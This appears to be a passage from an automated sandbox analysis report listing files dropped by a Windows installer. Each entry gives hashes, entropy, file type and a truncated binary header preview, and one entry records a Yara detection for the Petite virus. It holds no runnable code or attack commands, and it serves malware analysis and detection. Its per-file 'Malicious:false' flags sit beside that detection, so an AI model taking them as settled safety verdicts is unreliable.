                                                                                          SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                          SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):112640
                                                                                          Entropy (8bit):6.540227486061059
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                          MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                          SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                          SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                          SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                          Malicious:false
                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):906766
                                                                                          Entropy (8bit):6.450201653594769
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
                                                                                          MD5:AF785965AB0BF2474B3DD6E53DA2F368
                                                                                          SHA1:EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
                                                                                          SHA-256:8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
                                                                                          SHA-512:5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..|;.......<..................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):258560
                                                                                          Entropy (8bit):6.491223412910377
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                                          MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                                          SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                                          SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                                          SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):36752
                                                                                          Entropy (8bit):7.780431937344781
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                                          MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                                          SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                                          SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                                          SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):127669
                                                                                          Entropy (8bit):7.952352167575405
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                                          MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                                          SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                                          SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                                          SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmp, Author: Joe Security
                                                                                          Preview:MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):967168
                                                                                          Entropy (8bit):6.500850562754145
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                          MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                          SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                          SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                          SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                          Category:dropped
                                                                                          Size (bytes):506871
                                                                                          Entropy (8bit):7.998074018431883
                                                                                          Encrypted:true
                                                                                          SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                                          MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                                          SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                                          SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                                          SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                                          Malicious:false
                                                                                          Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                          Category:dropped
                                                                                          Size (bytes):506871
                                                                                          Entropy (8bit):7.998074018431883
                                                                                          Encrypted:true
                                                                                          SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                                          MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                                          SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                                          SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                                          SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                                          Malicious:false
                                                                                          Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):512014
                                                                                          Entropy (8bit):6.566561154468342
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                          MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                          SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                          SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                          SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):126478
                                                                                          Entropy (8bit):6.268811819718352
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                          MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                          SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                          SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                          SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):845312
                                                                                          Entropy (8bit):6.581151900686739
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                                          MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                                          SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                                          SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                                          SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):648384
                                                                                          Entropy (8bit):6.666474522542094
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                                          MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                                          SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                                          SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                                          SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):227328
                                                                                          Entropy (8bit):6.641153481093122
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                          MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                          SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                          SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                          SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):867854
                                                                                          Entropy (8bit):4.9264497464202694
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                                          MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                                          SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                                          SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                                          SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p................................*..........................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc...*.......,..................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):394752
                                                                                          Entropy (8bit):6.662070316214798
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                          MD5:A4123DE65270C91849FFEB8515A864C4
                                                                                          SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                          SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                          SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):68042
                                                                                          Entropy (8bit):6.090396152400884
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                                          MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                                          SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                                          SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                                          SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):123406
                                                                                          Entropy (8bit):6.263889638223575
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                                          MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                                          SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                                          SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                                          SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):562190
                                                                                          Entropy (8bit):6.388293171196564
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                                          MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                                          SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                                          SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                                          SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rd...............(..........................@.......................................@... .................................H...........................................................D...........................l............................text...T...........................`..`.data...X...........................@....rdata..H...........................@..@/4......P...........................@..@.bss....t................................idata..H............d..............@....CRT....0............n..............@....tls.................p..............@....rsrc................r..............@....reloc...............x..............@..B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):22542
                                                                                          Entropy (8bit):5.5875455203930615
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:RKAPwPQJgZd3rw0bGMtyz1fiaqmjj1nFY4j70UotV9mRyK:YPQJgZZwUGH1fJljj1+D18
                                                                                          MD5:E1C0147422B8C4DB4FC4C1AD6DD1B6EE
                                                                                          SHA1:4D10C5AD96756CBC530F3C35ADCD9E4B3F467CFA
                                                                                          SHA-256:124F210C04C12D8C6E4224E257D934838567D587E5ABAEA967CBD5F088677049
